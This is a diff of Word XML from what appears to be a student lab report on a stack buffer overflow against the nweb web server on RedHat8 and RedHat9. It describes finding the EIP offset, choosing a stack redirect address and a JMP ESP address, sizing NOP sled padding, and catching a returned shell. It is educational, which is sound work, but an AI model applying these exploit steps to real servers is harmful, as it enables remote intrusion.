+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>trial-and-error</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> method of wrapping my shell code with a padding of NOP sleds. The formula that essentially worked for me was putting close to enough padding of NOP sleds in the front that it reaches the redirection address, then putting the shell code and then putting padding of NOP sleds till you reach the start of the EIP at which point you put the address in reverse </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>order (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">cause Little Endian). </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">t took me close to a weekend to realize that when you send your exploit, if a program just receives NOP sleds, it will corrupt your input, or at least that is what happened in my case. The structure for my exploit which </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">is </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>overflow_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = NOP + shell code + NOP+Redirection address. However, when sending the exploit to the server, I created another string, called “</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1372,7 +2971,7 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> which starts with “</w:t>
+        <w:t xml:space="preserve">”, this string contained some non-trivial string, in my case </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1388,97 +2987,368 @@
           <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">” adds 10 bytes and the “b/” from using byte literals in python3 account for the remaining 12 bytes, thus, bringing us to 1032 bytes. Now, when we reach this distance, that is where the </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">input starts overflowing into the EIP. Now, as RedHat9 randomizes the ESP address, we cannot just put a static address(its still a static address, just not whatever the ESP address will be). We load the ESP with a JMP ESP instruction, this instruction basically tells your EIP to jump to wherever the ESP is located. After that, we fill our stack with some padding of NOP sleds again and put our shell code in the middle and then put some more NOP sleds. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>Determining the Parameters used in the Malicious Input</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>RedHat8</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Firstly, to figure out the buffer length we just keep feeding the program more and more data or you could create an absurdly large pattern using “</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>pattern_create</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>” in</w:t>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Since,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> we added </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>helloworld</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the start of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>send_string</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> you </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>have to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> subtract that many bytes from your padding. Try to remove it from the padding after the shell code so that you do not have to figure out a new starting NOP padding for your exploit. Now, after </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>similar to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the way you were testing while understanding the padding needed, you test to see if your exploit works. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Now, since the shell will be </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>returned back</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to some listening port, you have to listen on that port for that returned shell.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+        <w:t>RedHat9:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Now, since we are technically attacking the same program, however, on a newer version of the operating system that has stack address randomization</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">, most of the things we did are going to be the same as they were for the RedHat8 system. First, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>similar to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the way we figured out that we can control the EIP we check if the EIP is in the same place. Now, since the EIP is still 1032 bytes away, we just </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>have to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> figure out what address should be put in the EIP. Now, since we learnt about JMP ESP in the earlier part of this report, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>lets</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> run the program provided to us, or use Mona, to figure out where the JMP ESP. Now, it is important to know that the JMP ESP instruction </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>is located in</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a place where the progra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">m has shared files. After </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>running,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the program we are outputted with all the addresses where we can find the JMP ESP instruction. The </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>instruction,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I chose to go with was 0x421276c7. Now, once the EIP is loaded with this address, we go to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>look</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> if we are jumping to the ESP. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Upon comparing, it</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> seems that we do go inside the ESP however, we do not go to the start of the ESP. Now, to tackle this, we </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>have to</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> figure out a way to fill up the stack in such a way that we reach the shell code. This is not a problem as we learned that there is nothing a little padding cannot fix. Now, </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> this stage I did come up with an issue. Essentially, you could overflow the program so much that the Operating System takes over tells you that program does not take such inputs. So, we figure out how much padding we can put before we essentially run into a similar issue. </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Through,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> trial and error, I figured out that after about using 3000 units of NOP sleds your shell code will eventually be reached, and then I added about 30 units of NOP sleds just to be safe. Now, the general pattern that can be followed for similar operating systems, is that first we </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">add enough input to control our EIP, this could be filled up with whatever character, then we have 4 bytes of the address where the JMP ESP instruction exists and then we fill up the code with some padding and shell code and then again some more padding. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:bCs/>
+        </w:rPr>
+        <w:tab/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1487,569 +3357,43 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> framework. I used a pattern of size 3000 and sent it to the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>nweb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> server through </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>ncat</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">. This created a core dump on our recreation of the environment which told us that there was a segmentation fault with signal 11. Using the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>pattern_offset</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">, we figured out </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">that the saved EIP starts at a distance of 1032. Now, to figure out the architecture, I filled a string with 1032 “A”s and the last 4 bytes with “BCDE”. Upon inspecting the core dump file, the saved EIP was overflowed with “0x45444342”. This step helps us understand that we are working with a Little Endian Architecture and that we have control over what can be written over the EIP. The next part was to figure out what can be a suitable address to overwrite our EIP to and fill those addresses with our shell code. To figure out a suitable memory location we </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">use the command “x/64 $esp-0x__” and then try to work our way upwards to at least 205 bytes, cause that’s how long the shell code is. I worked my way up 0x33F where the memory was filled with As. The memory address I determined to redirect the flow of the code was “0xbffff7c1”. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>RedHat9:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Now, since the attack is being conducted on the same program, however, it is running a newer operating system with stack randomization, the only parameter that changes for us, is to figure out what addresses we could fill up and what addresses we could reach. Now, since the ESP is basically different </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>everytime</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">, we could either brute force for ages or use something called a JMP </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>ESP instruction. Essentially, a JMP ESP instruction is an instruction which tells the operating system to go to wherever the ESP is located. Now, it does not matter if we know where the ESP is, the operating system will literally hold our hand and take us to where ESP is hiding. There are multiple tools that can help us locate where the ESP, one of which I came across in my research is called Mona. However, we were given a program that searches where a JMP ESP is located. Now, once you figure out the address where the JMP ESP is located</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">, you basically know what you will be filling up in your EIP. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>Generating Malicious Input</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-        </w:rPr>
-        <w:t>RedHat8:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
